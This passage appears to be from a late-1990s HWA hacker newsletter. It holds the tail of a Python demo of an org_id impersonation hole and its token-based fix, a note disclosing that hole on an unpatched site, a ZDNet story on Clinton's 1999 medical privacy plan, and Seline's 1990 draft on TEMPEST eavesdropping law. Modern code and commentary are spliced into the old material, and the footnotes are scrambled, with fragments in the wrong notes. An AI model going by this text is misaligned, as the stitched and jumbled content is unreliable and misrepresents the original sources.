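    tok = strong.enroll(ORG)
    print("hardened, org_id only:  ",
          submit_hardened(strong, f"org_id={ORG}&round=2&statement=Not+ours"))
    print("hardened, with token:   ",
          submit_hardened(strong, f"org_id={ORG}&token={tok}&statement=Ours"))
    strong.rotate(ORG)
    print("hardened, stale token:  ",
          submit_hardened(strong, f"org_id={ORG}&token={tok}&statement=Again"))
```

The point of the rotate step is the one the UPDATE makes: changing the URL format while the old org_id-bearing URLs keep working changes nothing, because the server still treats the identifier as proof of identity. Only re-keying (or, as the note puts it, issuing new org_ids and disabling the old URLs) actually closes the hole.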
Please bear in mind, this is all in accordance with a state law. At this time multiple attempts have been made to contact the administrators of this web site and inform them of the problem. Hopefully no one will modify these documents in the meantime. I doubt they have any tape backups.

The moral of this story? If I have to spell it out, it wouldn't make sense to you anyway...

Mike
NetworkCommand.com
(when you can't just pull the plug)

@HWA

13.0 Clinton Privacy Plan: Is it Enough?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Maggie

President Clinton has unveiled a privacy plan aimed at protecting the privacy of individually identifiable health information. The plan would require health plans to get consent before releasing electronic medical records, require patient notification of use of records, and let patients view and correct their records. The rules are slated to go into effect on Feb. 21, 2000, after public comment on the issue. (This is at least a first step. There is so much further to go.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2384723,00.html?chkpt=zdnntop

Department of Health and Human Services - Contains Full Text and Summary of the Proposal
http://aspe.hhs.gov/admnsimp/

ZDNet;
--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Clinton privacy plan: only a first step
By Lisa M. Bowman, ZDNN
October 29, 1999 4:18 PM PT
URL:

In an attempt to prevent strangers from snooping at your online medical records, President Clinton Friday unveiled a plan that would place restrictions on how electronic medical information is used. The plan would require health plans to get consent before releasing electronic medical records in most cases, and requires them to notify patients about how their records are used.
It also would let patients view and correct their records. The rules are slated to go into effect on Feb. 21, 2000, after public comment on the issue. During his speech introducing the plan, Clinton acknowledged that electronic medical records can help save lives and lower costs. But he said that shouldn't be at the expense of privacy.

Horror stories

"Every American has a right to know that his or her medical records are protected at all times from falling into the wrong hands," Clinton said in a prepared statement from the Oval Office. "As they have been stored electronically, the threats to our privacy have substantially increased." As more and more records have been transferred into electronic form, horror stories about the release of medical records have alarmed consumers and privacy advocates. During his speech, Clinton cited a survey showing that one-third of all Fortune 500 companies check medical records before they hire or promote people. "This is wrong," he said. "Americans should never have to worry that their employers are looking at the medications they take or the ailments they've had."

Hacker attack

In September, hackers circulated a phone number that allowed anyone to access a database of private medical records stored at St. Joseph Mercy Hospital in Pontiac, Michigan. The hospital had been using a digital system that let doctors dictate medical records. Congress does not need to pass the Clinton plan because it missed a self-imposed August deadline requiring it to address online privacy or cede decisions on the issue to the secretary of health and human services.

Praise from privacy advocates

Privacy advocates and medical community members lauded the proposed rules as a first step toward ensuring that online medical records won't fall into the hands of marketers, corporate Big Brother types or the merely nosy. But they said the rules are only the first in a series of measures needed to truly protect the records.
"This is a wonderful start," said Dr. Michael Rozen, Director of Health Record Security for WellMed Inc. "With all of its limitations -- it only covers electronic records, it doesn't really protect consumers surfing sites -- the bottom line is this is more protection than we've ever seen," he said. Rozen said his company, which makes software that lets people access health information, already is more strict with medical data than would be required under the Clinton plan.

While the Clinton rules outline how health care sites and the medical community must deal with electronic records, they don't address scenarios when law enforcement is seeking access to them. They only apply to electronic, not paper, records. And they also don't restrict general health sites from sharing information about their visitors. For example, a health site containing information about AIDS or drug addiction can still freely release information about people who visit those sections. Nevertheless, Rozen said the Clinton plan should boost consumer confidence in medical sites because people can rest assured their medical records are safe. "It will do a great deal to provide consumers some protections for their medical records in electronic form," Rozen said.

The new rules come as major players in the tech industry are jumping into the medical market. Two weeks ago Intel Corp. joined the American Medical Association on a project that will let doctors and consumers exchange online medical records. That plan includes digital credentials for doctors exchanging information over the Internet.

@HWA

14.0 Tempest Laws Reviewed
~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Christopher J. Seline has released a draft of a paper that explains the legalities of eavesdropping on the electromagnetic emanations of digital equipment (TEMPEST). The paper covers the laws in Canada, England and the United States.
There are also recommendations for any future laws and a complete bibliography.

Cryptome
http://cryptome.org/tempest-law.htm

Date: Fri, 19 Jan 90 19:13:44 -0500
From: cjs%cwru@cwjcc.ins.cwru.edu (Christopher J. Seline (CJS@CWRU.CWRU.EDU))

The following is a prepublication draft of an article on TEMPEST. I am posting it to this news group in the hope that it will: (1) stimulate discussion of this issue; (2) expose any technical errors in the document; (3) solicit new sources of information; (4) uncover anything I have forgotten to cover.

I will be unable to monitor the discussions of the article. Therefore, PLEASE post your comments to the news group BUT SEND ME A COPY AT THE ADDRESS LISTED BELOW.

I have gotten a number of mail messages about the format of this article. Some explanation is in order: The numbered paragraphs following "____________________" on each page are footnotes. I suggest printing out the document rather than reading it on your CRT.

Thank you in advance.

Christopher Seline
cjs@cwru.cwru.edu
cjs@cwru.bitnet

(c) 1990 Christopher J. Seline

=============================================================================

Eavesdropping On the Electromagnetic Emanations of Digital Equipment: The Laws of Canada, England and the United States

Christopher J. Seline

This document is a rough draft. The Legal Sections are overviews. They will be significantly expanded in the next version.

We in this country, in this generation, are -- by destiny rather than choice -- the watchmen on the walls of freedom.[1]
- President John F. Kennedy

In the novel 1984, George Orwell foretold a future where individuals had no expectation of privacy because the state monopolized the technology of spying. The government watched the actions of its subjects from birth to death. No one could protect himself because surveillance and counter-surveillance technology was controlled by the government.
This note explores the legal status of a surveillance technology ruefully known as TEMPEST. Using TEMPEST technology the information in any digital device may be intercepted and reconstructed into useful intelligence without the operative ever having to come near his target. The technology is especially useful in the interception of information stored in digital computers or displayed on computer terminals.

The use of TEMPEST is not illegal under the laws of the United States, or England. Canada has specific laws criminalizing TEMPEST eavesdropping but the laws do more to hinder surveillance countermeasures than to prevent TEMPEST surveillance. In the United States it is illegal for an individual to take effective countermeasures against TEMPEST surveillance. This leads to the conundrum that it is legal for individuals and the government to invade the privacy of others but illegal for individuals to take steps to protect their privacy.

I. INTELLIGENCE GATHERING

Spying is divided by professionals into two main types: human intelligence gathering (HUMINT) and electronic intelligence gathering (ELINT). As the names imply, HUMINT relies on human operatives, and ELINT relies on technological operatives. In the past HUMINT was the sole method for collecting intelligence. The HUMINT operative would steal important papers, observe troop and weapon movements, lure people into his confidences to extract secrets, and stand under the eavesdrip of houses, eavesdropping on the occupants.

As technology has progressed, tasks that once could only be performed by humans have been taken over by machines. So it has been with spying. Modern satellite technology allows troop and weapons movements to be observed with greater precision and from greater distances than a human spy could ever hope to accomplish. The theft of documents and eavesdropping on conversations may now be performed electronically.
This means greater safety for the human operative, whose only involvement may be the placing of the initial ELINT devices. This has led to the ascendancy of ELINT over HUMINT because the placement and monitoring of ELINT devices may be performed by a technician who has no training in the art of spying. The gathered intelligence may be processed by an intelligence expert, perhaps thousands of miles away, with no need of field experience. ELINT has a number of other advantages over HUMINT. If a spy is caught his existence could embarrass his employing state and he could be forced into giving up the identities of his compatriots or other important information. By its very nature, a discovered ELINT device (bug) cannot give up any information; and the ubiquitous nature of bugs provides the principle state with the ability to plausibly deny ownership or involvement. ELINT devices fall into two broad categories: trespassatory and non-trespassatory. Trespassatory bugs require some type of trespass in order for them to function. A transmitter might require the physical invasion of the target premises for placement, or a microphone might be surreptitiously attached to the outside of a window. A telephone transmitter can be placed anywhere on the phone line, including at the central switch. The trespass comes either when it is physically attached to the phone line, or if it is inductive, when placed in close proximity to the phone line. Even microwave bugs require the placement of the resonator cone within the target premises. Non-trespassatory ELINT devices work by receiving electromagnetic radiation (EMR) as it radiates through the ether, and do not require the placement of bugs. Methods include intercepting information transmitted by satellite, microwave, and radio, including mobile and cellular phone transmissions. This information was purposely transmitted with the intent that some intended person or persons would receive it. 
Non-trespassatory ELINT also includes the interception of information that was never intended to be transmitted. All electronic devices emit electromagnetic radiation. Some of the radiation, as with radio waves, is intended to transmit information. Much of this radiation is not intended to transmit information and is merely incidental to whatever work the target device is performing. This information can be intercepted and reconstructed into a coherent form. With current TEMPEST technology it is possible to reconstruct the contents of computer video display terminal (VDU) screens from up to a kilometer distant; reconstructing the contents of a computer's memory.

____________________
For a discussion of the TEMPEST ELINT threat See e.g., Memory Bank, AMERICAN BANKER 20 (Apr 1 1985); Emissions from Bank Computer Systems Make Eavesdropping Easy, Expert Says, AMERICAN BANKER 1 (Mar 26 1985); CRT spying: a threat to corporate security, PC WEEK (Mar 10 1987).
By selectively firing the gun as it scans across the face of the CRT, the pixels form characters on the CRT screen.

ELINT is not limited to governments. It is routinely used by individuals for their own purposes. Almost all forms of ELINT are available to the individual with either the technological expertise or the money to hire someone with the expertise. Governments have attempted to criminalize all use of ELINT by their subjects --to protect the privacy of both the government and the population.

II. UNITED STATES LAW

In the United States, Title III of the Omnibus Streets and Crimes Act of 1968 criminalizes trespassatory ELINT as the intentional interception of wire communications. As originally passed, Title III did not prohibit non-trespassatory ELINT, because courts found that non-wire communication lacked any expectation of privacy. The Electronic Communications Privacy Act of 1986 amended Title III to include non-wire communication.
ECPA was specifically designed to include electronic mail, inter computer communications, and cellular telephones. To accomplish this, the expectation of privacy test was eliminated. As amended, Title III still outlaws the electronic interception of communications. The word "communications" indicates that someone is attempting to communicate something to someone; it does not refer to the inadvertent transmission of information. The reception and reconstruction of emanated transient electromagnetic pulses (ETEP), however, is based on obtaining information that the target does not mean to transmit. If the ETEP is not intended as communication, and is therefore not transmitted in a form approaching current communications protocols, then it can not be considered communications as contemplated by Congress when it amended Title III. Reception, or interception, of emanated transient electromagnetic pulses is not criminalized by Title III as amended.

III. ENGLISH LAW

In England the Interception of Communications Act 1985 criminalizes the tapping of communications sent over public telecommunications lines. The interception of communications on a telecommunication line can take place with a physical tap on the line, or the passive interception of microwave or satellite links. These forms of passive interception differ from TEMPEST ELINT because they are intercepting intended communication; TEMPEST ELINT intercepts unintended communication. Eavesdropping on the emanations of computers does not in any way comport to tapping a telecommunication line and therefore falls outside the scope of the statute.

IV. CANADIAN LAW

Canada has taken direct steps to limit eavesdropping on computers. The Canadian Criminal Amendment Act of 1985 criminalized indirect access to a computer service. The specific reference to an "electromagnetic device" clearly shows the intent of the legislature to include the use of TEMPEST ELINT equipment within the ambit of the legislation.
The limitation of obtaining "any computer service" does lead to some confusion. The Canadian legislature has not made it clear whether "computer service" refers to a computer service bureau or merely the services of a computer. If the Canadians had meant access to any computer, why did they refer to any "computer service"? This is especially confusing considering the all-encompassing language of (b) 'any function of a computer system'.

Even if the Canadian legislation criminalizes eavesdropping on all computers, it does not solve the problem of protecting the privacy of information. The purpose of criminal law is to control crime. Merely making TEMPEST ELINT illegal will not control its use. First, because it is an inherently passive crime it is impossible to detect and hence punish. Second, making this form of eavesdropping illegal without taking a proactive stance in controlling compromising emanations gives the public a false sense of security. Third, criminalizing the possession of a TEMPEST ELINT device prevents public sector research into countermeasures. Finally, the law will not prevent eavesdropping on private information held in company computers unless disincentives are given for companies that do not take sufficient precautions against eavesdropping and simple, more common, information crimes.

V. SOLUTIONS

TEMPEST ELINT is passive. The computer or terminal emanates compromising radiation which is intercepted by the TEMPEST device and reconstructed into useful information. Unlike conventional ELINT there is no need to physically trespass or even come near the target. Eavesdropping can be performed from a nearby office or even a van parked within a reasonable distance. This means that there is no classic scene of the crime; and little or no chance of the criminal being discovered in the act. If the crime is discovered it will be ancillary to some other investigation.
For example, if an individual is investigated for insider trading, a search of his residence may yield a TEMPEST ELINT device. The device would explain how the defendant was obtaining insider information; but it was the insider trading, not the device, that gave away the crime.

This is especially true for illegal TEMPEST ELINT performed by the state. Unless the perpetrators are caught in the act there is little evidence of their spying. A trespassatory bug can be detected and located; further, once found it provides tangible evidence that a crime took place. A TEMPEST ELINT device by its inherent passive nature leaves nothing to detect. Since the government is less likely to commit an ancillary crime which might be detected, there is a very small chance that the spying will ever be discovered.

The only way to prevent eavesdropping is to encourage the use of countermeasures: TEMPEST Certified computers and terminals. In merely making TEMPEST ELINT illegal the public is given the false impression of security; they are lulled into believing the problem has been solved. Making certain actions illegal does not prevent them from occurring. This is especially true for TEMPEST ELINT because it is undetectable. Punishment is an empty threat if there is no chance of being detected; without detection there can be no apprehension and conviction. The only way to prevent some entity from eavesdropping on one's computer or computer terminal is for the equipment not to give off compromising emanations; it must be TEMPEST Certified.

The United States can solve this problem by taking a proactive stance on compromising emanations. The National Institute of Standards and Technology (NIST) is in charge of setting forth standards of computer security for the private sector. NIST is also charged with doing basic research to advance the art of computer security. Currently NIST does not discuss TEMPEST with the private sector.
For privacy's sake, this policy must be changed to a proactive one. The NIST should publicize the TEMPEST ELINT threat to computer security and should set up a rating system for the level of emanations produced by computer equipment. Further, legislation should be enacted to require the labeling of all computer equipment with its level of emanations and whether it is TEMPEST Certified. Only if the public knows of the problem can it begin to take steps to solve it.

Title III makes possession of a surveillance device a crime, unless it is produced under contract to the government. This means that research into surveillance and counter-surveillance equipment is monopolized by the government and a few companies working under contract with it. NACSIM 5100A is classified, as are all details of TEMPEST. To obtain access to it, a contractor must prove that there is demand within the government for the specific type of equipment that it intends to certify. Since the standard is classified, the contractors cannot sell the equipment to non-secure governmental agencies or the public. This prevents reverse engineering of the standard from its physical embodiment, the Certified equipment. By preventing the private sector from owning this anti-eavesdropping equipment, the NSA has effectively prevented them from protecting the information in their computers.

If TEMPEST eavesdropping is criminalized, then possession of TEMPEST ELINT equipment will be criminal. Unfortunately, this does not solve the problem. Simple TEMPEST ELINT equipment is easy to make. For just a few dollars many older television sets can be modified to receive and reconstruct EMR. For less than a hundred dollars a more sophisticated TEMPEST ELINT receiver can be produced. The problem with criminalizing the possession of TEMPEST ELINT equipment is not just that the law will have little effect on the use of such equipment, but that it will have a negative effect on countermeasures research.
To successfully design countermeasures to a particular surveillance technique it is vital to have a complete empirical understanding of how that technique works. Without the right to legally manufacture a surveillance device there is no possible way for a researcher to have the knowledge to produce an effective countermeasures device. It is axiomatic: without a surveillance device, it is impossible to test a countermeasures device.

A number of companies produce devices to measure the emanations from electrical equipment. Some of these devices are specifically designed for benchmarking TEMPEST Certified equipment. This does not solve the problem. The question arises: how much radiation at a particular frequency is compromising? The current answer is to refer to NACSIM 5100A. This document specifies the emanations levels suitable for Certification. The document is only available to United States contractors having sufficient security clearance and an ongoing contract to produce TEMPEST Certified computers for the government. Further, the correct levels are specified by the NSA, and there is no assurance that, while these levels are sufficient to prevent eavesdropping by unfriendly operatives, equipment certified under NACSIM 5100A will have levels low enough to prevent eavesdropping by the NSA itself.

The accessibility of supposedly correct emanations levels does not solve the problem of preventing TEMPEST eavesdropping. Access to NACSIM 5100A limits the manufacturer to selling the equipment only to United States governmental agencies with the need to process secret information. Without the right to possess TEMPEST ELINT equipment, manufacturers who wish to sell to the public sector cannot determine what a safe level of emanations is. Further, those manufacturers with access to NACSIM 5100A should want to verify that the levels set out in the document are, in fact, low enough to prevent interception.
Without an actual eavesdropping device with which to test, no manufacturer will be able to produce genuinely uncompromising equipment.

Even if the laws allow ownership of TEMPEST Certified equipment by the public, and even if the public is informed of TEMPEST's threat to privacy, individuals' private information will not necessarily be protected. Individuals may choose to protect their own information on their own computers. Companies may choose whether to protect their own private information. But companies that hold the private information of individuals must be forced to take steps to protect that information.

In England the Data Protection Act 1984 imposes sanctions against anyone who stores personal information on a computer and fails to take reasonable measures to prevent disclosure of that information. The act mandates that personal data may not be stored in any computer unless the computer bureau or data user has registered under the act. This provides for a central registry and the tracking of which companies or persons maintain databases of personal information. Data users and bureaus must demonstrate a need and purpose behind their possession of personal data. The act provides tort remedies to any person who is damaged by disclosure of the personal data. Reasonable care to prevent the disclosure is a defense. English courts have not yet ruled what level of computer security measures constitutes reasonable care. Considering the magnitude of invasion possible with TEMPEST ELINT, it should be clear by now that failure to use TEMPEST Certified equipment is prima facie unreasonable care. The Remedies section of the act provides an incentive for these entities to provide successful protection of personal data from disclosure or illicit access. Failure to protect the data will result in monetary loss.
This may be looked at from the economic efficiency viewpoint as allocating the cost of disclosure to the persons most able to bear those costs, and also most able to prevent disclosure. Data users that store personal data would use TEMPEST Certified equipment as part of their computer security plan, thwarting would-be eavesdroppers. The Data Protection Act 1984 allocates risk to those who can bear it best and provides an incentive for them to keep other individuals' data private. This act should be adopted by the United States as part of a full-spectrum plan to combat TEMPEST eavesdropping. Data users are in the best position to prevent disclosure through proper computer security. Only by making them liable for failures in security can we begin to rein in TEMPEST ELINT.

VII. RECOMMENDATIONS

Do not criminalize TEMPEST ELINT. Most crimes that TEMPEST ELINT would aid, such as insider trading, are already illegal; the current laws are adequate.

The National Institute of Standards and Technology should immediately begin a program to educate the private sector about TEMPEST. Only if individuals are aware of the threat can they take appropriate precautions or decide whether any precautions are necessary.

Legislation should be enacted to require all electronic equipment to prominently display its level of emanations and whether it is TEMPEST Certified. If individuals are to choose to protect themselves they must be able to make an informed decision regarding how much protection is enough.

TEMPEST Certified equipment should be available to the private sector. The current ban on selling to non-governmental agencies prevents individuals who need to protect information from having the technology to do so.

Possession of TEMPEST ELINT equipment should not be made illegal. The inherently passive nature and simple design of TEMPEST ELINT equipment means that making its possession illegal will not deter crime; the units can be easily manufactured and are impossible to detect.
Limiting their availability serves only to monopolize countermeasures research, information, and equipment for the government; this prevents the testing, design and manufacture of countermeasures by the private sector.

Legislation mirroring England's Data Protection Act 1984 should be enacted. Preventing disclosure of personal data can only be accomplished by giving those companies holding the data a reason to protect it. If data users are held liable for their failure to take reasonable security precautions they will begin to take reasonable security precautions, including the use of TEMPEST Certified equipment.

References:

1. Undelivered speech of President John F. Kennedy, Dallas Citizens Council (Nov. 22, 1963) 35-36.

2. TEMPEST is an acronym for Transient Electromagnetic Pulse Emanation Standard. This standard sets forth the official views of the United States on the amount of electromagnetic radiation that a device may emit without compromising the information it is processing. TEMPEST is a defensive standard; a device which conforms to this standard is referred to as TEMPEST Certified. The United States government has refused to declassify the acronym for devices used to intercept the electromagnetic information of non-TEMPEST Certified devices. For this note, these devices and the technology behind them will also be referred to as TEMPEST; in which case, TEMPEST stands for Transient Electromagnetic Pulse Surveillance Technology. The United States government refuses to release details regarding TEMPEST and continues an organized effort to censor the dissemination of information about it. For example, the NSA succeeded in shutting down a Wang Laboratories presentation on TEMPEST Certified equipment by classifying the contents of the speech and threatening to prosecute the speaker for revealing classified information.

The pixels glow for only a very short time and must be routinely struck by the electron beam to stay lit.
To maintain the light output of all the pixels that are supposed to be lit, the electron beam traverses the entire CRT screen sixty times a second. Every time the beam fires it causes a high voltage EMR emission. This EMR can be used to reconstruct the contents of the target CRT screen. TEMPEST ELINT equipment designed to reconstruct the information synchronizes its CRT with the target CRT. First, it uses the EMR to synchronize its electron gun with the electron gun in the target CRT. Then, when the TEMPEST ELINT unit detects EMR indicating that the target CRT fired on a pixel, the TEMPEST ELINT unit fires the electron gun of its CRT. The ELINT CRT is in perfect synchronism with the target CRT; when the target lights a pixel, a corresponding pixel on the TEMPEST ELINT CRT is lit. The exact picture on the target CRT will appear on the TEMPEST ELINT CRT. Any changes on the target screen will be instantly reflected on the TEMPEST ELINT screen.

TEMPEST Certified equipment gives off emissions levels that are too faint to be readily detected. Certification levels are set out in National Communications Security Information Memorandum 5100A (NACSIM 5100A). "Emission levels are expressed in the time and frequency domain, broadband or narrow band in terms of the frequency domain, and in terms of conducted or radiated emissions." White, supra note 9, 10.1. For a thorough though purposely misleading discussion of TEMPEST ELINT see Van Eck, Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?, 4 Computers & Security 269 (1985). [See: http://jya.com/emr.pdf ]

3. This Note will not discuss how TEMPEST relates to the Warrant Requirement under the United States Constitution. Nor will it discuss the Constitutional exclusion of foreign nationals from the Warrant Requirement.
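The synchronize-then-slice reconstruction that note 2 describes, and the reason certification works by lowering the emission level rather than by outlawing the receiver, can be seen in a small simulation. This is an added example, not code from the original note, from Van Eck or from any TEMPEST standard: the 8x16 bitmap, the one-sample-per-pixel raster, the stronger sync burst (SYNC_GAIN) and the unit receiver noise are all constructed assumptions. It runs the same receiver against a strongly radiating screen and against a screen whose pulses sit well below the receiver's noise.

```python
import random

# Constructed 8x16 bitmap standing in for one CRT frame (1 = lit pixel).
SCREEN = [
    "1000001001111110",
    "1000001000011000",
    "1000001000011000",
    "1111111000011000",
    "1000001000011000",
    "1000001000011000",
    "1000001001111110",
    "0000000000000000",
]
ROWS, COLS = len(SCREEN), len(SCREEN[0])
SYNC_LEN = 4      # samples in the frame-sync burst (assumption)
SYNC_GAIN = 2.0   # the retrace/sync burst is taken to be twice a pixel pulse (assumption)


def emit(screen, amplitude, noise_sigma, rng, lead_in):
    """Waveform the target radiates in this toy model: `lead_in` noise-only samples,
    a sync burst, then one sample per raster slot (a pulse of `amplitude` for a lit
    pixel, nothing for a dark one), every sample with Gaussian receiver noise added.
    Returns (samples, index of the true sync start)."""
    samples = [rng.gauss(0.0, noise_sigma) for _ in range(lead_in)]
    sync_start = len(samples)
    samples += [SYNC_GAIN * amplitude + rng.gauss(0.0, noise_sigma)
                for _ in range(SYNC_LEN)]
    for row in screen:
        for ch in row:
            samples.append(amplitude * int(ch) + rng.gauss(0.0, noise_sigma))
    return samples, sync_start


def reconstruct(samples, rows, cols):
    """Receiver side, as note 2 describes it: first lock onto the sync burst
    (the window with the most energy), then slice each raster slot against a
    threshold derived from the burst level.  Returns (bitmap, sync index used)."""
    frame_len = SYNC_LEN + rows * cols
    best_energy, sync_guess = None, 0
    for start in range(len(samples) - frame_len + 1):
        energy = sum(samples[start:start + SYNC_LEN])
        if best_energy is None or energy > best_energy:
            best_energy, sync_guess = energy, start
    pixel_level = best_energy / SYNC_LEN / SYNC_GAIN   # estimated lit-pixel amplitude
    threshold = pixel_level / 2.0
    pixels = samples[sync_guess + SYNC_LEN:sync_guess + frame_len]
    bitmap = ["".join("1" if pixels[r * cols + c] > threshold else "0"
                      for c in range(cols)) for r in range(rows)]
    return bitmap, sync_guess


def bit_error_rate(original, recovered):
    """Fraction of pixels the receiver got wrong."""
    wrong = sum(a != b for ro, rr in zip(original, recovered) for a, b in zip(ro, rr))
    return wrong / (len(original) * len(original[0]))


def simulate(amplitude, noise_sigma=1.0, seed=1):
    """Radiate SCREEN at `amplitude` into noise of `noise_sigma`, reconstruct it,
    and report how well the eavesdropping receiver did."""
    rng = random.Random(seed)
    samples, true_sync = emit(SCREEN, amplitude, noise_sigma, rng, lead_in=37)
    recovered, sync_guess = reconstruct(samples, ROWS, COLS)
    return {
        "ber": bit_error_rate(SCREEN, recovered),
        "sync_locked": sync_guess == true_sync,
        "screen": recovered,
    }


if __name__ == "__main__":
    for label, amp in (("uncertified (pulse 10x noise)", 10.0),
                       ("certified-like (pulse 1/20 noise)", 0.05)):
        r = simulate(amp)
        print(f"{label}: sync locked={r['sync_locked']}, bit error rate={r['ber']:.2f}")
        print("\n".join(r["screen"]))
```

In the strong case the receiver locks sync and returns the frame pixel for pixel; in the faint case there is no burst to lock onto, the threshold is set by a noise peak, and the result is close to a coin flip per pixel. That margin between pulse level and receiver noise, not the legality of the receiver, is what an emission-level label or a certification threshold has to guarantee, which is why the note's measurement of emissions per frequency band is the number a defender cares about.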
Protecting privacy under TEMPEST should be made freely available; TEMPEST Certified equipment should be legally available; and organizations possessing private information should be required by law to protect that information through good computer security practices and the use of TEMPEST Certified equipment.

4. HUMINT has been used by the United States since the Revolution. "The necessity of procuring good intelligence is apparent & need not be further urged -- All that remains for me to add is, that you keep the whole matter as secret as possible. For upon Secrecy, Success depends in Most Enterprises of the kind, and for want of it, they are generally defeated, however well planned & promising a favorable issue." Letter of George Washington (Jul. 26, 1777).

5. "... I wish you to take every possible pains in your powers, by sending trusty persons to Staten Island in whom you can confide, to obtain Intelligence of the Enemy's situation & numbers -- what kind of Troops they are, and what Guards they have -- their strength & where posted." Id.

6. Eavesdrip is an Anglo-Saxon word, and refers to the wide overhanging eaves used to prevent rain from falling close to a house's foundation. The eavesdrip provided "a sheltered place where one could hide to listen clandestinely to conversation within the house." W. MORRIS & M. MORRIS, MORRIS DICTIONARY OF WORD AND PHRASE ORIGINS (1977).

7. Pursglove, How Russian Spy Radios Work, RADIO ELECTRONICS 89-91 (Jan. 1962).

8. Interception is an espionage term of art and should be differentiated from its more common usage. When information is intercepted, the interceptor as well as the intended recipient receive the information. Interception when not used as a term of art refers to one person receiving something intended for someone else; the intended recipient never receives what he was intended to receive.

9. There are two types of emissions, conducted and radiated.
Radiated emissions are formed when components or cables act as antennas for transmitting the EMR; when radiation is conducted along cables or other connections but not radiated it is referred to as "conducted". Sources include cables, the ground loop, printed circuit boards, internal wires, power supply to power line coupling, cable to cable coupling, switching transistors, and high-power amplifiers. WHITE & M. MARDIGUIAN, EMI CONTROL METHODOLOGY AND PROCEDURES 10.1 (1985).

"[C]ables may act as an antenna to transmit the signals directly or even both receive the signals and re-emit them further away from the source equipment. It is possible that cables acting as an antenna in such a manner could transmit the signals much more efficiently than the equipment itself... A similar effect may occur with metal pipes such as those for domestic water supplies. ... If an earthing [(grounding)] system is not installed correctly such that there is a path in the circuit with a very high resistance (for example where paint prevents conduction and is acting as an insulator), then the whole earthing system could well act in a similar fashion to an antenna. ... [For a VDU] the strongest signals, or harmonics thereof, are usually between 60-250 MHz approximately. There have however been noticeable exceptions of extremely strong emissions in the television bands and at higher frequencies between 450-800 MHz." Potts, Emission Security, 3 COMPUTER LAW AND SECURITY REPORT 27 (1988).

10. The TEMPEST ELINT operator can distinguish between different VDUs in the same room because of the different EMR characteristics of both homogeneous and heterogeneous units. "There is little comparison between EMR characteristics from otherwise comparable equipment. Only if the VDU was made with exactly the same components is there any similarity.
If some of the components have come from a different batch, have been updated in some way, and especially if they are from a different manufacturer, then completely different results are obtained. In this way a different mark or version of the same [VDU] will emit different signals. Additionally, because of the variation of manufacturing standards between countries, two VDUs made by the same company but sourced from different countries will have entirely different EMR signal characteristics... From this it may be thought that there is such a jumble of emissions around that it would not be possible to isolate those from any one particular source. Again, this is not the case. Most received signals have a different line synchronization, due to design, reflection, interference or variation of component tolerances. So that if for instance there are three different signals on the same frequency ... by fine tuning of the RF receiver, antenna manipulation and modification of line synchronization, it is possible to lock onto each of the three signals separately and so read the screen information. By similar techniques, it is entirely possible to discriminate between individual items of equipment in the same room." Potts, supra note 9.

memory or the contents of its mass storage devices is more complicated and must be performed from a closer distance. The reconstruction of information via EMR, a process for which the United States government refuses to declassify either the exact technique or even its name, is not limited to computers and digital devices but is applicable to all devices that generate electromagnetic radiation. TEMPEST is especially effective against VDUs because they produce a very high level of EMR,

11. TEMPEST is concerned with the transient electromagnetic pulses formed by digital equipment. All electronic equipment radiates EMR which may be reconstructed. Digital equipment processes information as 1's and 0's -- on's or off's.
Because of this, digital equipment gives off pulses of EMR. These pulses are easier to reconstruct at a distance than the non-pulse EMR given off by analog equipment. For a thorough discussion of the radiation problems of broadband digital information see, e.g., military standard MIL-STD-461 REO2; White, supra note 9, 10.2.

12. See supra note 2.

13. Of special interest to ELINT collectors are EMR from computers, communications centers and avionics. Schultz, Defeating Ivan with TEMPEST, DEFENSE ELECTRONICS 64 (June 1983).

14. The picture on a CRT screen is built up of picture elements (pixels) organized in lines across the screen. The pixels are made of material that fluoresces when struck with energy. The energy is produced by a beam of electrons fired from an electron gun in the back of the picture tube. The electron beam scans the screen of the CRT in a regular repetitive manner. When the voltage of the beam is high, the pixel it is focused upon emits photons and appears as a dot on the screen.

15. Pub. L. No. 90-351, 82 Stat. 197. The Act criminalizes trespassatory ELINT by individuals as well as governmental agents. Cf. Katz v. United States, 389 U.S. 347 (1967) (Fourth Amendment prohibits surveillance by government, not individuals).

16. 18 U.S.C. 2511(1)(a).

17. United States v. Hall, 488 F.2d 193 (9th Cir. 1973) (found no legislative history indicating Congress intended the act to include radio-telephone conversations). Further, Title III only criminalized the interception of "aural" communications, which excluded all forms of computer communications.

18. Willamette Subscription Television v. Cawood, 580 F.Supp 1164 (D. Or. 1984) (non-wire communications lack any expectation of privacy).

19. Pub. L. No. 99-508, 100 Stat. 1848 (codified at 18 U.S.C. 2510-710) [hereinafter ECPA].

20. 18 U.S.C. 2511(1)(a) criminalizes the interception of "any wire, oral or electronic communication" without regard to an expectation of privacy.

21. Interception of Communications Act 1985, Long Title: An Act to make new provision for and in connection with the interception of communications sent by post or by means of public telecommunications systems and to amend section 45 of the Telecommunications Act 1984.

22. Interception of Communications Act 1985 1, Prohibition on Interception: (1) Subject to the following provisions of this section, a person who intentionally intercepts a communication in the course of its transmission by post or by means of a public telecommunications system shall be guilty of an offence and liable-- (a) on summary conviction, to a fine not exceeding the statutory maximum; (b) on conviction on indictment, to imprisonment for a term not exceeding two years or to a fine or to both. ***

23. Tapping (aka trespassatory eavesdropping) is patently in violation of the statute. "The offense created by section 1 of the Interception of Communications Act 1985 covers those forms of eavesdropping on computer communications which involve "tapping" the wires along which messages are being passed. One problem which may arise, however, is the question of whether the communication in question was intercepted in the course of its transmission by means of a public telecommunications system. It is technically possible to intercept a communication at several stages in its transmission, and it may be a question of fact to decide the stage at which it enters the "public" realm." THE LAW COMMISSION, WORKING PAPER NO. 110: COMPUTER MISUSE 3.30 (1988).

24. "There are also forms of eavesdropping which the Act does not cover. For example, eavesdropping on a V.D.U. [referred to in this text as a CRT] screen by monitoring the radiation field which surrounds it in order to display whatever appears on the legitimate user's screen on the eavesdropper's screen. This activity would not seem to constitute any criminal offence..." THE LAW COMMISSION, WORKING PAPER NO. 110: COMPUTER MISUSE 3.31 (1988).

